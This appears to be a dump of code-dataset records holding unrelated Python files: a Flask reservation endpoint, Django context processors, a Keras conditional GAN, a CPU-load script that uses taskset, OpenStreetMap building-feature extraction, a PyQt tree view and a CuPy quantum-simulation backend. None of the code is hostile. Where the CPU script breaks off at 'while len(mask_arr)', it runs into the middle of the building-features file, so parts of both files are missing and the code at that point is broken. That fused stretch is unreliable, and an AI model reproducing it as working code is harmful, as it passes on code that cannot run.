+{"seq_id":"430408255","text":"from flask_restful import Resource, reqparse\nfrom db import db\nfrom flask import jsonify\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom models.user import UserModel\nfrom models.games import GameModel\nfrom models.players import PlayersModel\nfrom ast import literal_eval\n\n\nparser = reqparse.RequestParser()\nparser.add_argument(\n    'date', help='This field cannot be blank', required=True)\nparser.add_argument(\n    'course', help='This field cannot be blank', required=True)\nparser.add_argument(\n    'players', action='append', help='This field cannot be blank', required=True)\nparser.add_argument(\n    'totalScores', action='append', help='This field cannot be blank', required=True)\nclass reserveCourse(Resource):\n    @jwt_required\n    def post(self):\n        data = parser.parse_args()\n        user_email = get_jwt_identity()\n        user = UserModel.find_by_email(user_email)\n        players = data['players']\n        \n        try:\n            for player in players:\n                convert_player = literal_eval(player)\n                new_player = None\n                print(convert_player['email'])\n                new_player = PlayersModel.find_by_email(\n                    convert_player['email'], user.id)\n                if new_player== None: \n                    new_player = PlayersModel(\n                        user_id=user.id,\n                        email=convert_player['email'],\n                        name=convert_player['name'],\n                        aveScore=convert_player['aveScore']\n                    )\n                    new_player.save_to_db()\n                new_games = GameModel(\n                    course = data['course'],\n                    date = data['date'],\n                    user_id = user.id,\n                    player_id = new_player.id,\n                    total_score=int(data['totalScores'][0])\n                )\n                new_games.save_to_db()\n                new_games.game.append(user)\n                db.session.commit()\n            \n            return {\n                'message': 'Course {} was scheduled for {}'.format(data['course'], data['date'])\n            }, 200\n\n        except Exception as e:\n            
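# --- editor's note (added, not in the original record): a failed commit in
# the try-block above can leave the SQLAlchemy session in an aborted state.
# A hedged suggestion, assuming `db` is the Flask-SQLAlchemy handle imported
# at the top of this file:
#
#     db.session.rollback()  # discard the partially flushed transaction
#
# before logging the error and returning the 500 response below.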
print(e)\n return {'message': 'Something went wrong'}, 500\n\n","sub_path":"resources/reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238592006","text":"from django.urls import resolve\nfrom django.conf import settings\n\nfrom cmpirque.pages.models import Page\n\n\ndef site_context(request):\n return {\"site_name\": settings.SITE_NAME}\n\n\ndef pages_context(request):\n resolve_from_path = resolve(request.path)\n selected_map = {\"home\": True if resolve_from_path.url_name == \"home\" else False}\n if (\n resolve_from_path.view_name == \"pages:detail\"\n and \"slug\" in resolve_from_path.kwargs\n ):\n selected_map[resolve_from_path.kwargs[\"slug\"]] = True\n return {\n \"menu_pages\": [\n {\n \"title\": page.title,\n \"slug\": page.slug,\n \"url\": page.get_absolute_url(),\n \"selected\": selected_map.get(page.slug, False),\n }\n for page in Page.objects.all()\n ]\n }\n","sub_path":"cmpirque/pages/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334570349","text":"# -*- coding: UTF-8 -*-\nimport openpyxl\nfrom openpyxl.formatting.rule import IconSet, FormatObject\n\nsecond = FormatObject(type='percent', val=33)\n\nxlsx = openpyxl.Workbook()\nsheet_info = xlsx.create_sheet('文章分析')\nsheet_info.cell(row= 2, column= 2).value = 5/8\nsheet_info.cell(row= 2, column= 2).number_format = '0.00%'\n\n\nxlsx.save(\"/Users/xupeng/Desktop/xupengk.xlsx\")\n\n","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506372051","text":"instr = \"3113322113\"\n\nfor i in range(50):\n res = ''\n last = instr[0]\n count = 1\n for i in range(1,len(instr)):\n if instr[i] == last:\n count += 1\n else:\n res += str(count) + last\n last = instr[i]\n count = 1\n res += str(count) + last\n instr = res\n if len(instr) < 100:\n print(instr)\n\nprint(len(instr))\n","sub_path":"aoc10-1.py","file_name":"aoc10-1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"325438719","text":"#!/usr/bin/env python\n# encoding: utf-8\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\n######################################################################\n#\n# See COPYING file distributed along with the psignifit package for\n# the copyright and license terms\n#\n######################################################################\n\n\"\"\" Windows specific setup.py for Psignifit 3.x\n\nInstead of linking to a shared library like in `setup.py`, all of Psi++ is\ncompiled into the extension.\n\n\"\"\"\n\n# other imports, metadata and extension definition\nfrom setup import *\n\n# Psi++ source files\npsipp_sources = [\n \"src/bootstrap.cc\",\n \"src/core.cc\",\n \"src/data.cc\",\n \"src/mclist.cc\",\n \"src/mcmc.cc\",\n \"src/optimizer.cc\",\n \"src/psychometric.cc\",\n \"src/rng.cc\",\n \"src/sigmoid.cc\",\n \"src/special.cc\",\n \"src/linalg.cc\",\n \"src/getstart.cc\",\n \"src/prior.cc\",\n \"src/integrate.cc\"]\n\n# swignifit interface, override the definition in `setup.py`\nswignifit = Extension('swignifit._swignifit_raw',\n sources = psipp_sources + swignifit_sources,\n include_dirs=[\"src\"])\n\nif __name__ == \"__main__\":\n 
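# --- editor's note (added, not in the original record): `main` here
# presumably comes from the `from setup import *` at the top of this script
# and forwards to distutils/setuptools setup(). A typical build invocation
# for such a script would be:
#
#     python windows_setup.py build_ext --inplace
#
# which compiles all the listed Psi++ sources directly into the swignifit
# extension instead of linking against a shared library.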
main(ext_modules=[swignifit])\n","sub_path":"windows_setup.py","file_name":"windows_setup.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247891117","text":"from keras.models import Sequential, Model\nfrom keras.layers import Dense, Conv2D, Conv2DTranspose, Activation, Reshape\nfrom keras.layers import BatchNormalization, Dropout, Input, UpSampling2D\nfrom keras.layers import LeakyReLU, Flatten, Embedding, multiply\nfrom keras.datasets import mnist\nfrom keras.optimizers import Adam\nimport keras\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n\nclass CGAN():\n def __init__(self):\n # Size of the grayscale images in the dataset\n self.img_rows = 28\n self.img_cols = 28\n self.num_channels = 1\n self.num_classes = 10\n\n # Size of the noise vector used as input to the generator\n self.latent_dim = 100\n self.img_shape = (self.img_rows, self.img_cols, self.num_channels)\n\n optim = Adam(0.0002, 0.5)\n\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='binary_crossentropy', optimizer=optim,\n metrics=['accuracy'])\n self.generator = self.build_generator()\n\n z = Input(shape=(self.latent_dim,))\n label = Input(shape=(1,))\n img = self.generator([z, label])\n\n self.discriminator.trainable = False\n\n valid = self.discriminator([img, label])\n\n\n # self.combined = Sequential()\n # self.combined.add(self.generator)\n # self.discriminator.trainable = False\n self.combined = Model([z, label], valid)\n self.combined.compile(loss='binary_crossentropy', optimizer=optim)\n\n\n\n\n\n # Defines the Generator network model\n def build_generator(self):\n model = Sequential()\n\n # model.add(Dense(1024, input_dim=self.latent_dim))\n # model.add(Reshape((4, 4, -1)))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2DTranspose(128, 8, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 7, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(128, 4, data_format=\"channels_last\"))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Dropout(rate=0.3))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", 
padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # # model.add(Conv2DTranspose(64, 5, data_format=\"channels_last\", padding='same'))\n # # model.add(BatchNormalization())\n # # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2DTranspose(self.num_channels, 4, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation('tanh'))\n\n model.add(Dense(64 * self.img_rows * self.img_cols, activation=\"relu\", input_dim=self.latent_dim))\n model.add(Reshape((self.img_rows, self.img_cols, 64)))\n #model.add(UpSampling2D())\n model.add(Conv2DTranspose(64, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Activation(\"relu\"))\n model.add(LeakyReLU())\n model.add(Dropout(rate=0.3))\n #model.add(UpSampling2D())\n model.add(Conv2DTranspose(32, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n #model.add(Activation(\"relu\"))\n model.add(LeakyReLU())\n model.add(Dropout(rate=0.3))\n model.add(Conv2DTranspose(self.num_channels, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"tanh\"))\n\n print(\"Starting Generator layers\")\n for layer in model.layers:\n print(layer.input_shape, layer.output_shape)\n print(\"Ending Generator layers\")\n\n model.summary()\n\n noise = Input(shape=(self.latent_dim,))\n label = Input(shape=(1,), dtype='int32')\n label_embedding = Flatten()(Embedding(self.num_classes, self.latent_dim)(label))\n\n model_input = multiply([noise, label_embedding])\n img = model(model_input)\n\n return Model([noise, label], img)\n\n # Defines the Discriminator network model\n def build_discriminator(self):\n model = Sequential()\n\n\n model.add(Dense(64 * self.img_rows * self.img_cols, input_dim=np.prod(self.img_shape)))\n model.add(Reshape((self.img_rows, self.img_cols, 64)))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dense(512))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(0.4))\n # model.add(Dense(512))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(0.4))\n # model.add(Dense(1, activation='sigmoid'))\n\n\n # model.add(Conv2D(128, 4,input_shape=self.img_shape, data_format=\"channels_last\", padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n model.add(Conv2D(64, 7, data_format=\"channels_last\", padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n model.add(Conv2D(64, 7, data_format=\"channels_last\", padding='same'))\n model.add(BatchNormalization())\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(rate=0.3))\n # model.add(Conv2D(128, 7, data_format=\"channels_last\"))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Dropout(rate=0.3))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # model.add(BatchNormalization())\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n # 
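# --- editor's note (added, not in the original record): both networks in
# this CGAN are conditioned on the class label the same way -- the integer
# label goes through an Embedding, is flattened, and is multiplied
# element-wise into the other input. A minimal sketch with the Keras layers
# already imported in this file (`num_classes`, `vec_dim`, `vec` are
# placeholders for the concrete values used below):
#
#     label = Input(shape=(1,), dtype='int32')
#     emb = Flatten()(Embedding(num_classes, vec_dim)(label))  # (batch, vec_dim)
#     conditioned = multiply([vec, emb])  # vec: noise (generator) or flattened image (discriminator)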
model.add(BatchNormalization())\n        # model.add(LeakyReLU(alpha=0.2))\n        # model.add(Conv2D(64, 4, data_format=\"channels_last\", padding='same'))\n        model.add(Reshape((-1,)))\n        model.add(Dense(1, activation=\"sigmoid\"))\n        print(\"Starting Discriminator layers\")\n        for layer in model.layers:\n            print(layer.input_shape, layer.output_shape)\n        print(\"Ending Discriminator layers\")\n\n        model.summary()\n\n        img = Input(shape=self.img_shape)\n        label = Input(shape=(1,), dtype='int32')\n\n        label_embedding = Flatten()(Embedding(self.num_classes, np.prod(self.img_shape))(label))\n        flat_img = Flatten()(img)\n\n        model_input = multiply([flat_img, label_embedding])\n\n        validity = model(model_input)\n\n        return Model([img, label], validity)\n\n    # Trains the discriminator and generator networks of the GAN\n    def train(self, epochs, batch_size=128, gen_interval=50):\n        # The test sets and classifier labels don't matter\n        (X_train, Y_train), (_, _) = mnist.load_data()\n\n        # Rescaling images to [-1, 1] because of tanh\n        X_train = X_train / 127.5 - 1.0\n\n        # Adding a 4th dimension since keras expects 4D tensors\n        X_train = np.expand_dims(X_train, axis=3)\n\n        prev_disc_acc = 0\n        count = 0\n\n        for epoch in range(epochs):\n            idx = np.random.randint(0, X_train.shape[0], batch_size)\n            imgs, labels = X_train[idx], Y_train[idx]\n\n            # Generate a noise vector as input to the generator network\n            noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n\n            fake_imgs = self.generator.predict([noise, labels])\n\n            # Generate vectors of the correct labels to train the discriminator\n            real = np.ones((batch_size, 1))\n            fake = np.zeros((batch_size, 1))\n\n            #print(self.discriminator.metrics_names)\n            #print(self.combined.metrics_names)\n\n            # Only train the discriminator while its accuracy is below 60%, or\n            # after it has sat frozen for more than 50 batches; otherwise just\n            # evaluate it so its accuracy keeps being tracked.\n            if prev_disc_acc < 0.6 or count > 50:\n                real_loss = self.discriminator.train_on_batch([imgs, labels], real)\n                fake_loss = self.discriminator.train_on_batch([fake_imgs, labels], fake)\n                disc_loss = 0.5 * np.add(real_loss, fake_loss)\n                print(disc_loss)\n                prev_disc_acc = disc_loss[1]\n                count = 0\n            else:\n                real_loss = self.discriminator.evaluate([imgs, labels], real)\n                fake_loss = self.discriminator.evaluate([fake_imgs, labels], fake)\n                disc_loss = 0.5 * np.add(real_loss, fake_loss)\n                prev_disc_acc = disc_loss[1]\n                count += 1  # count skipped batches so the 'count > 50' unfreeze condition can fire\n\n            # real_loss = self.discriminator.train_on_batch(imgs, real)\n            # fake_loss = self.discriminator.train_on_batch(fake_imgs, fake)\n            # disc_loss = 0.5 * np.add(real_loss, fake_loss)\n            #print(disc_loss)\n\n            # Generate a new noise vector to train the generator on the combined model\n            noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n            gen_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)\n            gen_loss = self.combined.train_on_batch([noise, gen_labels], real)\n            #print(gen_loss)\n\n            print(\"%d [Disc loss: %f, acc.: %.2f%%] [Gen loss: %f]\" % (epoch, disc_loss[0], 100*disc_loss[1], gen_loss))\n\n            if epoch % gen_interval == 0:\n                self.gen_images(epoch)\n\n    # Saves a grid of digit images produced by the generator network\n    def gen_images(self, epoch):\n        r, c = 2, 5\n        noise = np.random.normal(0, 1, (r * c, self.latent_dim))\n        gen_labels = np.arange(0, 10).reshape(-1, 1)\n        gen_imgs = self.generator.predict([noise, gen_labels])\n\n        # Rescale images 0 - 1\n        gen_imgs = 0.5 * gen_imgs + 0.5\n\n        fig, axs = plt.subplots(r, c)\n        cnt = 0\n        for i in range(r):\n            for j in range(c):\n                axs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')\n                axs[i,j].set_title(\"Digit: %d\" % gen_labels[cnt])\n                axs[i,j].axis('off')\n                cnt += 1\n        fig.savefig(\"images8/%d.png\" % 
epoch)\n plt.close()\n\n # Converts a directory full of images into a gif\n def save_video(self):\n\n path = 'images8/'\n\n image_folder = os.fsencode(path)\n\n filenames = []\n\n for file in os.listdir(image_folder):\n filename = os.fsdecode(file)\n if filename.endswith( ('.jpeg', '.png', '.gif') ):\n filenames.append(path+filename)\n\n filenames.sort() # this iteration technique has no built in order, so sort the frames\n\n images = list(map(lambda filename: imageio.imread(filename), filenames))\n\n imageio.mimsave(os.path.join('movie8.gif'), images, duration = 0.04)\n\n\ncgan = CGAN()\ncgan.train(10000)\ncgan.save_video()\n","sub_path":"cgan_example.py","file_name":"cgan_example.py","file_ext":"py","file_size_in_byte":12488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"546985196","text":"import yfinance as yf\r\n\r\n#atv = input(str(\"código do ativo:\"))\r\n#atv = atv + \".SA\"\r\nativo = yf.download(\"6L=F\", progress=False)['Adj Close']\r\ncash3 = yf.download(\"CASH3.SA\", start=\"2020-11-09\", end=\"2021-12-09\",progress=False)['Close']\r\narq = open(\"teste.txt\",'w')\r\narq.write(str(cash3))\r\narq.close()\r\nprint(cash3)","sub_path":"YahooFinance/cash3.py","file_name":"cash3.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342596184","text":"# Author : Mao zhixiang\n# Email : 405641872@qq.com\n# Date : 2016.05.29\nimport subprocess as sp\nimport time\nimport sys\n\nnum_of_cpus = 0\nset_pids = []\navailable_cpus = 0\nmask_arr = []\nlast_check_cpu_time = []\ninfo_names = ['processor','vendor_id','cpu family','model name','cpu MHz','cache size','cache_alignment']\n\ndef set_cpu_rate(cpuid,rate):\n global set_pids\n global mask_arr\n if mask_arr[cpuid]==0:\n return \n if set_pids[cpuid]!=0: \n reset_cpu_rate(cpuid)\n set_ps = sp.Popen(['./set_cpu_rate',str(cpuid),str(rate)])\n set_pids[cpuid] = set_ps.pid\n print('the pid of set process is',set_ps.pid)\n tsk_ps = sp.call(['taskset','-cp',str(cpuid),str(set_ps.pid)])\n \ndef reset_cpu_rate(cpuid):\n global set_pids\n global mask_arr\n if mask_arr[cpuid]==0:\n return \n if set_pids[cpuid]!=0: \n sp.call(['kill',str(set_pids[cpuid])])\n set_pids[cpuid] = 0\n print('reset cpu rate of cpu%d.'%(cpuid))\n return\n\ndef get_cpu_rate():\n global num_of_cpus\n global last_check_cpu_time\n global mask_arr\n rates = []\n for i in range(num_of_cpus):\n if mask_arr[i]==0:\n continue \n tmp = check_cpu_time(i)\n totle = tmp['totle']-last_check_cpu_time[i]['totle']\n idle = tmp['idle']-last_check_cpu_time[i]['idle']\n last_check_cpu_time[i] = tmp\n if totle!=0:\n #rates.append(int((totle-idle)/totle*100)) --doesn't work in python2\n rates.append(int(float(totle-idle)/totle*100))\n else:\n rates.append(0)\n return rates\n\ndef get_cpu_info():\n global available_cpus\n cpuid = 0\n infos = []\n with open('/proc/cpuinfo') as ifl:\n info = dict()\n for line in ifl:\n if line == '\\n':\n if mask_arr[cpuid]==1: \n infos.append(info)\n cpuid = cpuid+1\n info = dict()\n else: \n tmp = line[0:len(line)-1].split(':')\n for info_name in info_names:\n if tmp[0].startswith(info_name):\n info[info_name] = tmp[1].strip()\n return {'infos':infos}\n\ndef get_cpu_num():\n count = 0\n with open('/proc/cpuinfo') as ifl:\n info = dict()\n for line in ifl:\n if line == '\\n':\n count = count+1\n info = dict()\n return count\n \ndef check_cpu_time(cpuid):\n cpuid = cpuid + 2\n with open('/proc/stat') as sfl:\n while 
cpuid>0:\n cpuid = cpuid -1 \n line = sfl.readline()\n #print(line)\n tms = line[0:len(line)-1].split(' ')\n res = dict()\n res['idle'] = int(tms[4])\n res['totle'] = 0\n for i in range(1,len(tms)):\n res['totle'] = res['totle']+int(tms[i])\n return res\n\ndef set_mask():\n global mask_arr\n global num_of_cpus\n test_ps = sp.Popen([\"sleep\",\"3\"])\n p = sp.Popen([\"taskset\",\"-p\",str(test_ps.pid)],stdout=sp.PIPE)\n out_str = str(p.stdout.read()).split(':')[1].strip()\n if sys.version_info.major==3:\n mask = int(out_str[0:len(out_str)-3],16)\n else:\n mask = int(out_str,16)\n mask_arr = []\n while mask != 0:\n mask_arr.append(mask%2)\n mask = int(mask/2)\n while len(mask_arr) 0: #%count and percentage of civilan buildings + area\r\n area_residental=d['house']+d['residential']+d['terrace']+d['detached']+d['bungalow']+d['dormitory']\r\n v.append(area_residental)\r\n v.append(round(area_residental/(gdf_proj['building'].dropna().value_counts().sum()),4))\r\n area_residental=0\r\n for i in my_list:\r\n area_residental+=gdf_proj[gdf_proj['building']==i].area.sum()\r\n v.append(area_residental)\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n my_list=[i for i in religious if i in list(d.keys())]\r\n if len(my_list) > 0: #% count religious buildings + area\r\n area_residental=d['cathedral']+d['chapel']+d['church']+d['mosque']+d['religious']+d['shrine']+d['synagogue']+d['temple']\r\n v.append(area_residental)\r\n area_residental=0\r\n for i in my_list:\r\n area_residental+=gdf_proj[gdf_proj['building']==i].area.sum()\r\n v.append(area_residental)\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'commercial' in d:\r\n v.append(d['commercial']) #Total commercial buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='commercial'].area.sum()) #commerical building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'retail' in d:\r\n v.append(d['retail']) #Total retail buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='retail'].area.sum()) #retail building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'school' in d:\r\n v.append(d['school']) #Total school buildings count\r\n v.append(gdf_proj[gdf_proj['building']=='school'].area.sum()) #school building area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'university' in d:\r\n v.append(d['university']) #Total university count\r\n v.append(gdf_proj[gdf_proj['building']=='university'].area.sum()) # university area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n if 'yes' in d:\r\n v.append(d['yes']) #Total unclassified count\r\n v.append(gdf_proj[gdf_proj['building']=='yes'].area.sum()) # unclassified area\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n else:\r\n v.append([np.nan]*24)####################13\r\n v= [item for sublist in v for item in sublist]\r\n \r\n if 'amenity' in cols: #order changed ,19+1\r\n d=defaultdict(int,dict(gdf_proj['amenity'].value_counts()))\r\n v.append(len(gdf_proj['amenity'].dropna().unique())) #Tyes of amenities\r\n v = amenity(d,v)\r\n else:\r\n temp=[[np.nan]]*20\r\n v= v + [item for sublist in temp for item in sublist]\r\n\r\n if 'tourism' in cols:\r\n d = defaultdict(int,gdf_proj.tourism.value_counts())\r\n v.append(len(list(gdf_proj['tourism'].dropna().unique()))) # Types of Tourism\r\n v.append(gdf_proj.tourism.value_counts().sum()) # Total tourism related stuff\r\n v.append(d['attraction']) # tourist attractions\r\n else:\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n v.append(np.nan)\r\n\r\n if 'leisure' 
in cols:\r\n v.append(gdf_proj.leisure.value_counts().sum()) # Total Leisure\r\n else:\r\n v.append(np.nan)\r\n\r\n return v \r\n","sub_path":"code/building_features.py","file_name":"building_features.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362169320","text":"from PyQt4 import QtGui, QtCore\n\n\nclass Widget(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.filterLe = QtGui.QLineEdit(self)\n self.mytreeview = QtGui.QTreeView(self)\n self.setLayout(QtGui.QVBoxLayout())\n self.layout().addWidget(self.filterLe)\n self.layout().addWidget(self.mytreeview)\n self.model = QtGui.QStandardItemModel(self.mytreeview)\n\n self.proxyModel = QtGui.QSortFilterProxyModel(self.mytreeview)\n self.proxyModel.setSourceModel(self.model)\n self.mytreeview.setSortingEnabled(True)\n\n # set model\n self.mytreeview.setModel(self.proxyModel)\n self.mytreeview.clicked.connect(self.update_model)\n self.filterLe.textChanged.connect(self.onTextChanged)\n self.initialise_model()\n\n @QtCore.pyqtSlot(str)\n def onTextChanged(self, text):\n self.proxyModel.setFilterRegExp(text)\n\n def initialise_model(self):\n for text in [\"parent1\", \"parent2\", \"parent3\"]:\n item = QtGui.QStandardItem(text)\n self.model.appendRow(item)\n\n def update_model(self, index):\n ix = self.proxyModel.mapToSource(index)\n parent = self.model.itemFromIndex(ix)\n for text in [\"children1\", \"children2\", \"children3\"]:\n children = QtGui.QStandardItem(\"{}_{}\".format(parent.text(), text))\n parent.appendRow(children)\n self.mytreeview.expand(index)\n\n\nif __name__ == '__main__':\n import sys\n app = QtGui.QApplication(sys.argv)\n w = Widget()\n w.show()\n sys.exit(app.exec_())","sub_path":"temp/46868452.py","file_name":"46868452.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"122858340","text":"import numpy as np\nfrom qibo.backends.numpy import NumpyBackend\nfrom qibo.config import log, raise_error\n\nfrom qibojit.backends.cpu import NumbaBackend\nfrom qibojit.backends.matrices import CupyMatrices, CuQuantumMatrices, CustomMatrices\n\n\nclass CupyBackend(NumbaBackend): # pragma: no cover\n # CI does not have GPUs\n\n DEFAULT_BLOCK_SIZE = 1024\n MAX_NUM_TARGETS = 7\n\n def __init__(self):\n NumpyBackend.__init__(self)\n\n import cupy as cp # pylint: disable=import-error\n import cupy_backends # pylint: disable=import-error\n\n self.name = \"qibojit\"\n self.platform = \"cupy\"\n self.versions[\"cupy\"] = cp.__version__\n\n self.supports_multigpu = True\n self.numeric_types = (\n int,\n float,\n complex,\n cp.int32,\n cp.int64,\n cp.float32,\n cp.float64,\n cp.complex64,\n cp.complex128,\n )\n self.tensor_types = (np.ndarray, cp.ndarray)\n from scipy import sparse\n\n self.npsparse = sparse\n self.sparse = cp.sparse\n self.device = \"/GPU:0\"\n self.kernel_type = \"double\"\n self.matrices = CupyMatrices(self.dtype)\n self.custom_matrices = CustomMatrices(self.dtype)\n try:\n if not cp.cuda.runtime.getDeviceCount(): # pragma: no cover\n raise RuntimeError(\"Cannot use cupy backend if GPU is not available.\")\n except cp.cuda.runtime.CUDARuntimeError:\n raise ImportError(\"Could not detect cupy compatible devices.\")\n\n self.cp = cp\n self.is_hip = cupy_backends.cuda.api.runtime.is_hip\n self.KERNELS = (\n \"apply_gate\",\n \"apply_x\",\n \"apply_y\",\n \"apply_z\",\n 
\"apply_z_pow\",\n \"apply_two_qubit_gate\",\n \"apply_fsim\",\n \"apply_swap\",\n )\n\n # load core kernels\n self.gates = {}\n from qibojit.custom_operators import raw_kernels\n\n def kernel_loader(name, ktype):\n code = getattr(raw_kernels, name)\n code = code.replace(\"T\", f\"thrust::complex<{ktype}>\")\n gate = cp.RawKernel(code, name, (\"--std=c++11\",))\n self.gates[f\"{name}_{ktype}\"] = gate\n\n for ktype in (\"float\", \"double\"):\n for name in self.KERNELS:\n kernel_loader(f\"{name}_kernel\", ktype)\n kernel_loader(f\"multicontrol_{name}_kernel\", ktype)\n kernel_loader(\"collapse_state_kernel\", ktype)\n kernel_loader(\"initial_state_kernel\", ktype)\n\n # load multiqubit kernels\n name = \"apply_multi_qubit_gate_kernel\"\n for ntargets in range(3, self.MAX_NUM_TARGETS + 1):\n for ktype in (\"float\", \"double\"):\n code = getattr(raw_kernels, name)\n code = code.replace(\"T\", f\"thrust::complex<{ktype}>\")\n code = code.replace(\"nsubstates\", str(2**ntargets))\n code = code.replace(\"MAX_BLOCK_SIZE\", str(self.DEFAULT_BLOCK_SIZE))\n gate = cp.RawKernel(code, name, (\"--std=c++11\",))\n self.gates[f\"{name}_{ktype}_{ntargets}\"] = gate\n\n # load numba op for measuring frequencies\n from qibojit.custom_operators.ops import measure_frequencies\n\n self.measure_frequencies_op = measure_frequencies\n\n # number of available GPUs (for multigpu)\n self.ngpus = cp.cuda.runtime.getDeviceCount()\n\n def set_precision(self, precision):\n super().set_precision(precision)\n if self.dtype == \"complex128\":\n self.kernel_type = \"double\"\n elif self.dtype == \"complex64\":\n self.kernel_type = \"float\"\n\n def set_device(self, device):\n if \"GPU\" not in device:\n raise_error(\n ValueError, f\"Device {device} is not available for {self} backend.\"\n )\n # TODO: Raise error if GPU is not available\n self.device = device\n\n def cast(self, x, dtype=None, copy=False):\n if dtype is None:\n dtype = self.dtype\n if self.sparse.issparse(x):\n if dtype != x.dtype:\n return x.astype(dtype)\n else:\n return x\n elif self.npsparse.issparse(x):\n cls = getattr(self.sparse, x.__class__.__name__)\n return cls(x, dtype=dtype)\n elif isinstance(x, self.cp.ndarray) and copy:\n return self.cp.copy(self.cp.asarray(x, dtype=dtype))\n else:\n return self.cp.asarray(x, dtype=dtype)\n\n def to_numpy(self, x):\n if isinstance(x, self.cp.ndarray):\n return x.get()\n elif self.sparse.issparse(x):\n return x.toarray().get()\n elif 